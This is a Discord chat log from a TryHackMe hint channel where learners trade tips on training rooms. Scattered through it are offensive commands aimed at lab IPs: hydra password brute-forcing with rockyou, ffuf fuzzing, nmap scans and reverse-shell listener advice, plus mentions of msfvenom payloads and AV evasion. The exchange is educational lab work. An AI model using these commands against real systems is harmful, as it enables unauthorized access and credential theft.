#room-hints

and the proxy should be on right when sending i assume?

yeah

yes your right , this is my last room for the day otherwise ill pull my hair out. and thank you for being patient with me. im not leet like some of yall but i try and learn

hello

i need help with my burp suite i cannot load rockyou.txt

in payload

you don't want to load rockyou into burpsuite... the free version gets exponentially slower over time to prevent users from brute forcing with it. If you're using it for a room you likely have the wrong wordlist, and if you're just using it, you would probably be better off with a different tool

ok ty

Gave +1 Rep to @pallid moss

Any room in development with this: https://github.com/markakd/dirtycred ?

same question but asked in #room-ideas so lets wait and see

ah woops, wrong channel.. ok thanks 🙂

Gave +1 Rep to @alpine kestrel

So I’m doing the Linux PrivEsc room and when I try to ssh in I get this back. ----> Unable to negotiate with 10.10.124.190 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

sniped by lassi again

No... I thought the whole reason for joining the THM discord was to ask questions here for help?

LOL... Ok then I did not know that.. Thanks..

Hello everyone I've just created my account and I'm starting the Jr pentester career ,, I'am actually at Web Application|content discovery|Manual Discovery - Framework Stack, I'm 99,9% sure i have given the good flag, after several tries I have finally checked on internet if my flag was the good one and I have also a positive answer, however it wont accept de flag. Would you have any hint about what should I do ? I tried to send a DM to THM and no success. Cheers

!docs verify

Can you put your flag in spoiler? Like this || <flag>||

What do you mean by 'in spoiler', just write the flag here in the pattern you mentioned or there is a spoiler group specific for that ?

Using spoiler will hide your flag before clicking

|| flag ||

OK, so what i basically did was to go to the site ACME IT and i added /tmp.zip in the url to download the zip file and inside I found the flag which is ||THM{KEEP_YOUR_SOFTWARE_UPDATED}||

Which room btw?

jr penetration test / introduction to web hacking / content discovery

Its incorrect flag for task Manual Discovery Framework Stack

ok thanks, i'll keep woorking

Re read the task.

i'll do itm cheers

just found it, thank you

it worked

Hm, would I be right in assuming that there's a docker escape needed in ohmywebserver after getting user?

Could someone give me a hint for the room Burp Suite Basics plz ?
I'm working on the question;

Take a look around the site on http://10.10.113.15/ -- we will be using this a lot throughout the module. Visit every page linked to from the homepage, then check your sitemap -- one endpoint should stand out as being very unusual!

Visit this in your browser (or use the "Response" section of the site map entry for that endpoint)

What is the flag you receive?

I've clicked on every single linked page and there's nothing showing in the site map that seems suspicious ?

This one took me a good few clicks.

@lucid junco I've clicked everything though......

I mean........ there is nothing left to click.

Is there a filter i might need to change or something @lucid junco ??

No, I just sat and clicked all the links, sometimes multiple times.

Right........ i've clicked everything though, this isn't making sense.

@lucid junco I think i found it........

<5yjR2GLcoGoij2ZK>

Is this the droid i'm looking for ?

i am new and totally confused.
what is the answer of what do you need to access for web applications

Click it and see.

Well, what do you think you need?

I mean........ I found the suspicious end-point..

I will try to find the flag.

You should be able to click the end point in burp?

its a question in learning section of try hack me and not able to get the answer
it can be web browser or server

web browser is too ||long|| 😉

@lucid junco I have, there is no flag in there.

Visit the webpage in the browser?

Huh ?

task 8 john the ripper need help please haha

My hint was to you.

@lucid junco 404 not found.......

I assume you're not adding the < and > ?

still couldnt get the answer

What did you try?

web browser

It's too long

Count the number of * in the answer.

Is a clue to how long the and/or the answer format

Did you get it now?

thanks will try

Gave +1 Rep to @lucid junco

@lucid junco I have it now......... I had the URL typed incorrectly. Thanks.

Gave +1 Rep to @lucid junco

How does @green minnow decide when someone gets +1 Rep ?

just wondering if im on the right track for task 8 john the ripper ive tried --rule["A-Z"]

when you reply to someone saying "thanks" or "ty" or similar

What if i type, thanks @fresh grove .

@pallid moss Lol, thanks @pallid moss

it won't give anything now for 5 minutes since your last one

got the answer. it was browser and i was typing web browoser

thanks

@pallid moss Oh right....... Can i give myself +1 rep by thanking myself ?

@tulip vortex Thanks.........

lol

don't think so

for which question? I think you're along the right lines

what rule would we use to add all capital letters to the end of the word

now im thinking its [List.rules:"cAZ"]

if it's regex based you'll need a $ at the end

I haven't done that one so it's really just something to consider ✌️

yeah cheers

Would someone give me a hint for the Quotient room plz ?

I mean...... Do i need to break out of the sage account into the Admin account ?

so, that's too long for the answer format. Look at what you need to do to "Append to the End of a Word", then add your "[A-Z]" on the end of it

AZ"[A-Z]"

took me ages jesus lol

first z should be lowercase, but yes

i need hint after getting into ssh shell as alice on room wonderland

i can see a python file with sudo perm as rabbit

any hint?

try to sudo -l and see what u can exploit with that given py file

(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

there is a good write up that explain this exploit very well

for your security purpose i wont paste the link

i want tjo do this on my own bro

i need some hint

||exploit the path of python library||

thanks bro let me try

Having some trouble trying to upgrade a reversd shell established via 2019-6714 (hackpark room)

Currently listening via msfconsole's multi/handler

certutils permissions seem to be barred for urlcache

0 feedback from powershell to check if a command is running, no luck thus far trying to pull from a local http server

Msfconsole upload - appears to be throttled to upload in 256b chunks and fails on the first chunk upload
(Attempts to send both an msfvenom payload exe and a netcat binary both failed)

Am i messing something up or is there an other means i should investigate?

(attempting a session upgrade via shell_to_meterpreter also failing)

Turns out powershell is very pedantic

was trying to wrap a command in brackets to enable doublequotes for strings, but it should have been doublequotes with single-quote for strings

100% it is

hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-26 15:36:14
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://10.10.10.6:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.10.10.6 - login "dale" - pass "123456" - 1 of

should i wait for this to be over or go on and search for the answer

coz its basically bruteforcing

You get it? I did that room just the other day, so somewhat fresh in my mind.

I forgot........ I'm working on the Overpass room now.

Could someone give me a hint with the Overpass room plz ?

I'm trying this;
Cookies.set("SessionToken","anything")
I end up with this;
Uncaught ReferenceError: Cookies is not defined
<anonymous> debugger eval code:1
debugger eval code:1:9

Would someone plz give me a clue here, i'm not sure why this isn't working.......

Guys can someone give me a hint with this Question.

What would be the name of the machine account associated with a machine named TOM-PC?

|| cookies.set(SessionToken,"letmein") ||

I didn't need to use that........

It worked like this the second time i tried it;
Cookies.set("SessionToken","anything")

Great

hey @cold eagle would you help me trouble shoot something plz.........

I'm getting an error when doing the PrivEsc.........

where are you stucked at?

Thanks @cold eagle

Gave +1 Rep to @cold eagle

+rep

Any nudge on zeno room please, i’m stuck at the administrator login panel

You got the database?

No, any hint on that ?

Sqlmap?

Hello, could someone give me a hint for the room "https://tryhackme.com/room/subdomainenumeration#", last ccommand it says to run "ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}", Edit the above command replacing {size} with the most occurring size value from the previous result and try it on the AttackBox, and according to them 2 results will be found, however all page sizes is 472, so when I type -fs 472 i have no answer I have only some lines that look like nothing for exemple ":: Progress: [453/1907] :: Job [1/1] :: 314 req/sec :: Duration: [0:: Progress: [454/1907] :: Job [1/1] :: 312 req/sec :: Duration: [0"

this is the ffuf results after using -fs 472

:: Method : GET
:: URL : http://10.10.29.136
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.acmeitsupport.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 472

:: Progress: [1907/1907] :: Job [1/1] :: 403 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

Are you on your own machine or the attackbox?

attackbox

Looks to me you are using the wrong IP

Is this your attackbox IP that you are fuzzing ?

yep

Ye, then that's wrong.
You have to start the target machine of that room

😵‍💫 my bad,, thanks

Hi, I'm in the Firewalls room on task 1 and the last question is about allowing SNMP over SSH and which port should be permitted. I cant seem to find what port that should be, no material I've looked at has been any help

Nevermind I got it

was just about to refer you to some sources on it

👍

Hello friends so here I am doing this python room but I keep submitting what I think should be the answer but I keep getting error so I’m thinking, maybe I might be wrong and someone out here can save my ass, I think the answer should be ^^requests.get*

But THM says hell no stop playing boy

You killed it fam

That was right and thanks

i got stuck in enum stage on the room looking glass , i think there is a information disclosure vuln in ssh
(OpenSSH-7.6p1) any hint how to exploit it?

you mean the custom exploits?

Hi, I'm in room Firewalls Task 7 Port Tunneling. If I'm understanding the task correctly it wants me to set up a listener on the web server on port 8008 with a command to forward traffic to port 25. So I submitted the command and tried to connect to the listener via a terminal and it just sits in limbo. No connection time out or refusal

Gonna try reloading the server but I bet its something I'm doing wrong

there are so many ports are in open state and nmap show's service as ssh on every single port

Okay so I'm able to get a connection through ncat but I dont get a shell

And I can only get a connection from port 21, which is the previous task. It says port 8008 should work but its not for me

Okay I have a headache. Cant get the GET request to go through like I think it wants. Ill try later

why are you inputting the target machine ip in the command instead of the attack box ip into the command to catch it as a reverse shell???

Anyone able to give a hint on Enterprise? I have two users, can RDP into the DC, have gathered some useful info through the hound but simply can't figure out what I'm missing on the lateral movement here.... 🤔

Also have found the secret files but haven't been able to decrypt them...

Nvm... I'm dumb... The vegetable helped me see what I was overlooking!

anyone know how to do last part of task 3 in intro to digital forensics. I cant do the last command to get the camera model for cat ransom

nvm

heya, need some help or hints for challenge 1 of the file inclusion room

||using burp to change GET to POST and tried ../../../../etc/flag1 but no response with the flag yet||

Try to use the right click function of burp to change GET to POST rather than changing it manually, this will automatically add a necessary header

will try that

that worked

so it was wrong header that messed this up?

A missing header

got it, thanks

Hey i am currently doing the "Linux Privilege Escalation" room. I have some problems with Task 7. There i need to escalate privileges with the SUID bit.
I tried GTFOBins but i do not find any working one. I also thought about cracking a password, but i cant read the /etc/shadow which i need for john the ripper. Does anybody can give me a hint?

Which binary you are using to read files?

Oh I didn't understand what they meant by using "local host" with the forwarding so I used the target IP again. Figured that out but that wasn't my only problem. Managed to find some obscure help online, not sure which fixed my problem but adding -nv to my nc argument on my machine and during the GET request changing the the spelling of "default" to "defalt" which ever did it I got the page 😅

I recommend to read man page of nc because normally when u nc $IP $PORT, it means that u are trying to connect to that but to get a reverse shell u need to listen for it not trying to reach it, and the common command that i always use is nc -lnvp $PORT

hmm okay, thanks i will have a look again

Gave +1 Rep to @burnt rivet

okay, i am dumb xD. I already saw and tried it, but i did not used a single brain cell^^. now i've got the task.

howdy folks. I'm in the /networkservices room, task 6 where I'm enumerating a telnet(?) server. Except nmap isn't working for me. I'm showing only closed ports, and when I try to run nmap -p- [IP] it just hangs. Any ideas?

I'm assuming I'm using the wrong options for nmap, but after trying for a few days I could use a tip.

sudo nmap -sS -p- -vv -T5 iphere

the verbose part will help a lot to see that nmap is actually doing something
the -T5 will speed up the scan emensily
the -sS part is redundant but why not include it anyways

ahh yes, seeing the remaining time is great, thanks a lot @alpine kestrel !

Gave +1 Rep to @alpine kestrel

no problem

and I've already found my first open port. That was clearly the ticket. Notes have been made for the future haha

is there any tip on when to use sudo with nmap? should i just always use it?

now that you found the open port you can do sudo nmap -sC -sV -vv -p portnumber ip

syn stealth scan instead of tcp connect scan is the main difference if you don't mess with a lot of options

right okay. I remember reading something about that needing direct socket access or something, i.e. needing elevated permissions. thanks times two @alpine kestrel

would recommend the nmap module to learn a lot of this: https://tryhackme.com/module/nmap

I really liked the nmap room

A lot to learn

well there is the further nmap room.... which is decent... then there is this module on nmap which has multiple rooms and goes even more in depth

Kenobi
I stuck here can someone give me clue how should i implement "mod_copy.py" rce to ftp server ?

Is it possible rce ?

@burnt rivet Thanks

Gave +1 Rep to @burnt rivet

Hey guys, I'm doing the Burp module (scoping and targeting task) and I'm instructed to add http://MACHINE_IP/ into scope and change the Proxy settings to only intercept traffic to in-scope targets so as to See the difference between the amount of traffic getting caught by the proxy before and after limiting the scope.

My question is:

Where can I see this difference? I've been moving back and forth between the dashboard, target, and proxy tabs but i don't see any changes in anything.

Have you started the machine, yes?

yes

Burp is def proxying traffic i just don't see how proxy > options > intercept client requests > and URL is in target scope is changing anything or where I am supposed to look for these changes.

Ah ok I get it now, I had to drop or forward the packets in order to see the other requests in the intercept queue facepalm
I was expecting to see a complete view of all requests being made.

Walking an application room, I need to find a flag in a directory, where can I find the directory?

I checked the sources but there isn't any file named flag.txt, am I doing something wrong?

You need to look in the directories.

So, in the room it is assumed that we know where the directory is? This was confusing even after searching on the internet, but thanks!

Gave +1 Rep to @dusk totem

u can check inspect tab (Source) or just brute force the directory

I checked the source but the flag wasn't there, thanks tho!

Gave +1 Rep to @languid isle

check|| /assets ||if u still haven't finished the room

In the room Chosen Undead I couldn't think of anything besides || typing the Sha-1 hashes of frampt and kaathe there respectively. || The collide button rings some bells as well but I don't have anything else, anyone got a clue?

I actually finished the room with the same hint. Although I didn't know this was a page in the site but where was it given that we have to check ||/assets||?

the things i always do to web site is brute force the directory so i just check every directory i found

but obviously as the name ||assets||, this should be a place to store stuff

Okay so that's why it was saying that the directory listing was enabled, so brute forcing it would give us all the directories available on the site I'm guessing?

yea mostly but in real world they can hide it ( i think)

but in lab environment, most likely u can brute force it if the name of the directories are in the wordlist that u use

unless they have random string name directory

Oh, I see, thanks!

Gave +1 Rep to @languid isle

hi

need help with a question.

An attacker has penetrated your organisation's security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?

its the highest but its not the asnwer..

nvm got it

hello all I am doing Break Out The Cage machine,

and i found the following string "UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKR
Wxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQS
B5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds" ,and after base64 decoding it becomes the folloing:

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.

Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

i have tried rot13 with rotations but no results, any help ?

rot47????

it becomes with characters and numbers, it doesn't work

It could be done with something else after.

any ideas ?

to where possibly could be done ?

figured it out

got the clear text of the above now

hint hint: ||Vigenere|| @sharp geode

it need a key for decoding, i am gonna look for it

if you can't find it try the brute force approach

i will try both ways, thanks a lot

no problem

any thoughts on this?

nope sorry no idea

also can't find that room when searching for it on tryhackme so either it is a private room or it was given to you for home work which means we should not really help you

i really appreciate your help, i brute force it and found the secret key using this website: https://www.boxentriq.com/code-breaking/vigenere-cipher

Good job you got it now

I dont think it is a private room as I just searched through subscription only challange rooms that I have not completed and found it, nor do I think it is a homework since I didn't enroll in such educational programs

link to the room then???

but without your help, i could it doing easily, thanks again

Gave +1 Rep to @alpine kestrel

Gonna send it in a second

i couldn't *

that link will let shadow check if the room is private or not

no problem... shadow figured it out quick as it looked like some sort of cipher text and then tryhackme rarely does the very hard ones

https://tryhackme.com/room/chosenundead

wow I searched for it and didn't get any results as well, but luckily I could find it through an open tab

yeah that room is marked as private now

guess it is either getting archived and removed or updated

The room started pretty neat but not being able to get to the actual content because of incompetence in riddle solving kinda annoys me

well guess the room is not done yet and has yet to be released.... it is only 230 days old when most rooms are over 400 days old when they become public

That might be the case as well but I'm still craving for an answer for that riddle, though I'm probably gonna drop the room

well no writeups either so can't really help you without trying themselves and don't feel like doing that on a private room that has yet to be released

seems like that but thanks for the effort anyways

no problem

any hint on priv esc for MindGames room?

ive used linpeas

and got a public exploit

but it is not working as it needs ssh shell

despite generating ssh keys , sssh requires password

If it's a CVE, it's wrong

Whatever it is, it doesn't need ssh

i tried cve-||\2021-4034||

no other clues so far

also there is a executable in home users directory

and its being called by system

Linpeas will highlight it.
It's kinda like ||suid bit but a lot more granular.||

pwned it ,thanks

hey, i have a trouble in the msfRoom at msfvenom part
when the handler is set, i try to run the reverse-shell, but when i press enter key, the session close
any idea ?

hello everyone.
Tell me please
What are my first steps towards getting an NTLM hash in the Blueprint room?
Somehow a lot of information:
There is also a website on port ||8080||
There are SMB directories.
I can upload a file via SMB
I understand I need to catch a hash
||Responder|| (that's just through what)
But what should I do first?
Something should be simple and banal
which is clearly related to the resource on the site via port ||8080||
(a room from the easy series)
I'm in a stupor=)

hello all, I doing IDE room, and i found a login page on port 62337, and found a username say "alex" and got other information from Burp request, so i crafted a hydra brute force attack on the login page as following:

hydra -l alex -P /usr/share/wordlists/rockyou.txt 10.10.216.124 -s 62337 http-get-form "/index.php username=^USER^+&password=^PASS^&theme=default&language=en:f = invalid' -V"

but an error occurs: the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: f = invalid' -V

any help ?

sorry it's as follows: hydra -l john -P /usr/share/wordlists/rockyou.txt 10.10.216.124 -s 62337 http-get-form '/index.php username=^USER^+&password=^PASS^&theme=default&language=en' -V

Is it missing a colon to segment the index.php and username=^ params?

e.g.
http-get-form "/index.php:username=^USER^+&password=^PASS^&theme=default&language=en:<failure string>" -V

hello again, currently I am doing Dav room, only port open is 80, checked the source page and nothing useful, i found a directory /webdav but needs credentials , which there is no information about them what so ever, ideas ?

Can I get some help with the HOLO network. I am at task 36. For some reason mimikat wont run properly. I do have what I did documented. Any help
would be great.

probably larger chance to get help in the #holo-network channel for the network

roger that thanks jedi

Hi, I'm in Daily Bugle room but i can't find the Joomla version. Can someone give me a little hint ?

https://github.com/OWASP/joomscan

What setting name that allows you to modify the Host header in a Meterpreter payload?
Can't find it anywhere

i'm getting this error while connecting to ssh on lookingglass room

Unable to negotiate with 10.10.176.51 port 13789: no matching host key type found. Their offer: ssh-rsa

If you get an error saying Unable to negotiate with <IP> port 22: no matching how to key type found. Their offer: ssh-rsa, ssh-dss this is because OpenSSH have deprecated ssh-rsa. Add -oHostKeyAlgorithms=+ssh-rsa to your command to connect.

I'll add a note to the room as well

Actually, @stuck fractal that's your room, are you happy if i put that as a hint?

ssh -oHostKeyAlgorithms=+ssh-dss -p 9100 10.10.176.51
Unable to negotiate with 10.10.176.51 port 9100: no matching host key type found. Their offer: ssh-rsa

rsa not dss

ohhh okay

thanks dude now it's working

+rep @pallid moss

Gave +1 Rep to @pallid moss

No.
If they're capable of solving the room, they're capable of googling an error.

Ok

can anyone help me out with this question in https://tryhackme.com/room/passwordattacks ?

I am thinking of crunch 5 5 -t "THM@!" -o tryhackme.txt but it won't work. Thanks in advance.

It also should be "THM@\!" because ! is a special character, but the length of the answer should be 5

Thank! So tired I didn't even understand properly what it meant 😅

Gave +1 Rep to @burnt rivet

https://tryhackme.com/room/introtoc2
completely stuck on task 7 question 2

What setting name that allows you to modify the Host header in a Meterpreter payload?

and the hint is less than worthless

nm i solved it

What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers?

any hint on this

hi sandbox evasion task 4 last question. Which evasion technique involves burning compute-time to escape the sandbox?

any nudge

#red-teaming-path message

it should be named in the task content 🙂

runtimedetectionevasion stuck on task 6 any hint why my code is not working

the term is not recognized

i dont understand i split the file shell.exe in the signature evasion but i cannot find the kibibyte any advice ?

i dont understand the question i think

kibibyte just refers to which 1000 bytes it's in, so if it was 33,283 bytes in, it'd be at 33000 when you round it.

oh okay

any hints on red team opsec task 7??? first part???

shadow can't figure it out

The number order?

yuups

lets wait as robert stated it might be redesigned

It will be yeah, but you can brute force it

sorry for sending the same question in 2 channels

eeew brute forcing tryhackme answers

https://www.thisworldthesedays.com/httpswwwartcomassetsopt2jpg.html

Yeah, the redesign will not be a soon thing.

ok thanks robert i was just having the not good kibibyte

if my file is considered already uploaded what can i do ?

hello

Any hints please : )

you can scroll left and right in there

yes

the things highlighted in blue is what is being used.... the rest is just there to show other things that could be used @sage cloak

😅

you can also scroll up and down

yes

could it be this ?

have you tried that???

if you do you would know

idk what to type lol

system Binary ? or is it one of those

try rundll32 as the middle question answer

or you could check the att&ck framework for what the differnt thingies kinda mean

your emoji/emote names are so weird to shadow

Its just random numbers 😅

Heart is for thanks, it was the answer inferno needed

The frog is inferno blush

😅

you will get better at using mitre over time

I hope so 🙏

I still need to figure out 2 questions

the first question is basicly just looking how many blue boxes there are under one of the groups of things

i tried

but didn't work

it is not 16 if that is what you tried... but if you scroll up and down when looking at that it should be obvious how many thingies there are under it

Huh ? I counted the blue boxes myself its 16

Maybe something specific 🤔

https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0008%2FG0008-enterprise-layer.json @sage cloak

is the correct website to check

Can someone help me with Obfuscation Principles task 8? I got stuck on obfuscation.

Yeah , im there

if you check only the stuff that is below command and control.... how many blue boxes???

16 what the hack

not the number that is stated there.... the blue boxes

can you show an image???

yeah see there is only 2 blue coloured boxes

ah Multi is in both ss

that ??????????????????

What

Omg

Iam soo stupid

Enough try hack me for tonight

lmao

Thanks for the help shadow

no problem

+rep @alpine kestrel

Gave +1 Rep to @alpine kestrel

:)

you made shadow laugh.... that is a good reward

Glad to hear : )

hello guys

i was playing room/cyborgt8 , but i got stuck in privilage escalation, any hints..?

Hi! I'm doing the red team threat intel room on task 7. I cannot find where I'm supposed to get the last answer for the static website thing. Any hints are welcome

hey guys ,who know the commend for connecting win via rdp in linux?

Hi there! So you're stuck on the Exfiltration/Impact technique?

Did you check out the different software being used on the APT41 page ?

Oh, the answer for the static site, nvm my answer then 😄

Having the same issue!

Did you copy paste the flag or type it on your own ?

I typed it. It's a message box and I can't copy and paste it

Well then there might be a chance you are mixing i - I with l - L

Perhaps. I will try.

You were right. Doesn't look like it should be, but you were right. Many thanks!

Gave +1 Rep to @left thunder

Have anyone got the shell after successful av evasion in https://tryhackme.com/room/avevasionshellcode room. Task 2

have created and uploaded so many undetectable reverse shell payloads, av evasion is successful but somehow not getting shell back on my listener

Yes

If you’re looking at the MITRE ATT&CK Navigator, if you scroll towards the right side of the screen there is a category for Exfiltration and another for Impact

This is what I've got so far but I can't for the life of me tell whats wrong

Am I basing it off of the wrong one? I'm going off of 41

This?

i get urlmon.h no such file or directory, in the sandbox evasion room

any help?

Yep, that! If you move all the way to the right you should see the sections you’re looking for

Nothing I’m putting in is working am I just entering the wrong thing?

Are you entering highlighted techniques beneath the Exfiltration or Impact header?

The answers

Its been 30 minutes

hi in case u did slove this

can u help me with this one

I haven't yet but it helps to look at the comparisons to see which section you need to look at

How come they both have the same IP address?

oh

just making this clear, all devices on a network use the same public IP address?

Not necessarily, but usually

This is part of NAT

Depends on network rules, and whether a reverse proxy is in place.

wow they giving misleading info in the rooms 😱

They aren't. As intro level material, it's normal to reduce the amount of real-world complications to make the content understandable.

yes i wasnt being fully serious dw

so what sorta thing would i put in my notes

"usually all devices on one network use the same public IP address"?

You're going to hate me for this but... They're your notes.

Understand the content, distill it.

gonna watch this video quickly https://www.youtube.com/watch?v=FTUV0t6JaDA

so i can maybe then understand to make better notes

.

im need help for that question

(What technique's purpose is to exploit the target's system to execute code?)

i really don't know how to pass it

what module are you in?

red team

read the chart again

under the column "purpose"

you'll find the answer

idk how to responde

like ned for execude the code right

nned

need*

the answer is on the chart

purpose

there's 3 columns. the middle column shows the question, word-for-word

on the chart*

yeee

thanks a lot

if you ever get stuck, re-read

yeah i know but im not really good at eng

i have 15y did u think its too late if learn now basic staff?

what did u think

You are 15 years old ?
And you ask if it's too late ?

yeah idk when need to start

I'm 35. just started 6 months ago. you're never too old

as long as you're passionate about it and about learning/researching and reading.

you'll be fine

ohh thx

i want to become the best of the best

hard work

like him

https://tenor.com/view/rami-malek-mr-robot-elliot-alderson-gif-18214205

tireless work

i know but i want so hard

that's good man 🙂

keep working

thx

start with the beginner modules

i already know the beginer staff like linux

oh good

i know how to cod im py

i would still definitely do the early modules though. it will engrain basic web technologies, networking and other concepts

i do it

like nmap and linux

its was easy but one my frined told me to do the red team

without them you'll quickly get lost when faced with techniques that are new to you

i haven't tried it yet so i don't know how hard or easy it is

ok

what are u traniing now?

traning

aiming for OSCP. Hopefully some time next summer/autumn

common active directory exploits rn

yooo

GG

bro what avout that

(
What is the first access type mentioned in the document?)

i re read evry thing

can someone give me a nudge on "sandbox evasion" challenge?

I'm stuck on the Red team threat intel room task 7 question 2 and I have no clue where I'm supposed to be looking. Any hints?

can someone help me with Evading Logging and Monitoring Room I cant get the flag I remove all the logs and disable powershell login but I still get

I'm stuck with the file inclusion lab challenge 3. I can't seem to figure out how to get the path null-terminated and I haven't found out any other character to insert here by googling. The hint says it is using PHP $_REQUEST but it appears populating the variable with cookies have been turned off from the php configuration (which is the default setting) so I can't use that and I'm only able to use GET and POST

Hello, I'm doing the room Vulnet EndGame, I was able to dump the database but I'm stuck.
Any help please

hello everyone, I am doing Phishing Emails 5 room, and there is "challenge.eml" file to investigate it in a "Show View Split" machine, i tried to copy the content of the file, but it's too large to copy, and tired to wget python server on my machine and it also doesn't work

so can someone please send me the file, so i can do the challenge

Don't mind, I found something 🙂

i found a found a solution

passed the room

hey im need help for red team

(What is the first access type mentioned in the document?)

this is the question pls help me

I am also facing the same issue

it's difficult trying that

DM

Hello. I'm doing vulnnet endgame, I'm looking for the CMS but I wasn't able to find it.
Can I have a hint please?

@burnt rivet thank you

Gave +1 Rep to @burnt rivet

https://tenor.com/view/pokemon-ash-hat-turned-around-throw-gif-8995789

Just made me think of that haha ❤️

hahaha

but yeah keep at it brother, also check out some of the streamers that do this stuff... Lots of good insight / it's nice to feel part of a community

I am stuck on this room: https://tryhackme.com/room/passwordattacks

The question is: What would the syntax you would use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?

The hint is: Az"[0-9][0-9]" ^[**] = Example: @password80

I know some regex and I've followed the room but I have no idea what that question even means.

||The hint is so close to the answer.||

Might be but I have been comming back to this one three days in a row now. Don't think I will solve it. What does the question mean? I do not understand the question tbh.

It's asking for you to create a rule.

I'm a little lost on inferno, I have the foothold but I can't work out how to get from foothold to user.

You got a log in?

i'm just stuck as www

login, and shell.

also persistence shell.

Have you seen the ||poem|| ?

nothing screams out to me through linpeas.sh

the one on the main page of http?

or the many references to it

to answer your question, no.

||downloads||

oh yeah. I've seen a few things there

guess I should look at them

Send a screenshot 😄

The rule is supposed to be: ||^[!@?][aZ][0-9][0-9]$|| if I an not mistaken. But I fail to put it into john syntax

Look very closely at the hint.

You're so close.

However. You're not ||#seeing everything||

😉

I know I am, but it's punching me in the face.

OOOHH

sneaky.

IT WAS LITERALLY PUNCHING ME IN THE FACE

HOLY CRAP

😂

I even tried to ssh-keygen my own user for www-data 😛

Ok I got it. Face -> table. What a strange syntax.

Not going to befriend this one

Ty for the help.

Hello in active directory basics

In sub module managing users in AD

How can I access the Phillip's computer

rdp or the attackbox

or split view

Ok... have to admit... in the end I actually had to get it to finish the room. Touché.

Just know how to access other account weather from RDP or attackbox

both i guess

Have you complete that room names active directory basics

What was the flag found on Sophie's desktop?

To change the creds of sophie

We need to login as phillip

After that by using powershell phillip will change the Sophie's password

And after that in order to login to Sophie's desktop I need to know how can I firstly change my administrator account and login as phillip

After that how can I log in as Sophie in order to get that flag on that Rey hack me windows machine

This is the question of active directory basics beginner path

Anyone stuck at evading loggin and monitoring ?

Can anyone help me with this

Just do what the task explainef

Oke, can someone give me a hint on Obfuscation Principles, task 5, question 2 : What obfuscation layer aims to confuse an analyst by manipulating the code flow and abstract syntax trees?

See this explanation @exotic girder

I'm trying to do task 29 of the OWASP Top 10 room and I'm not quite sure what to exploit. I've looked at a few things, logged in as admin, found apache version and openssh version (with nmap) but I haven't found any exploits yet. Could someone give me a hint on where I should be looking?

did you search on google?

||I found that the site is made from a template from projectworlds. However, I can't seem to find exploits with the versions mentioned in the tutorial to make the app||

Is it online bookstore?

https://projectworlds.in/online-book-store-project-in-mean-stack-angularjs-mongodb/
This one

Yeah I've looked for every software with version I could find

Unless I should be looking for less specific stuff on exploit-db?

Forgive for typing mistake

I think I've tried that exact script, the link is marked as already visited

But is that the one? I'll try it again

this is what it's giving me when I try it

bruh moment, I completely read over that part

Thanks 🙏 @burnt rivet @cold eagle

Gave +1 Rep to @burnt rivet

thanks @cold eagle sorry for second ping but I gotta give you that rep 🦾

Gave +1 Rep to @cold eagle

Hi can I get a bit of assistance with room Kenobi Task 3. So I created and mounted the directory as it wanted me to and generally followed instructions before that now it wants me to cp and chmod a key named id_rsa and use it but I'm just a little turned around after mounting the directory and how to access the key through it

Hello, I'm working on Zeek Exercises, Task 3. Its asking what kind of file is associated with the malicious document. I finished the rest of task 3, but this eludes me. is it asking for a file type, or something else? ive tried a couple options that i thought were reasonable but none of the obvious to me answers are correct. Does anyone have any advice?

Any hint @solemn smelt

Please post your question and the room etc. in this channel as Metapoit described and be patient 🙂

Room: Blue
Task 5: Find Flags
URL: https://tryhackme.com/room/blue
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Thanks

Gave +1 Rep to @topaz umbra

add the room name / url and task number. You will get help sooner if you make it easier for people

perfect

🙂

If there is an Admin user but I cant see it in the shell what does that mean?

I already have the highest privilege

I cant open the room atm because I'm working but it sounds like you should just look around a bit if you have done priv esc already

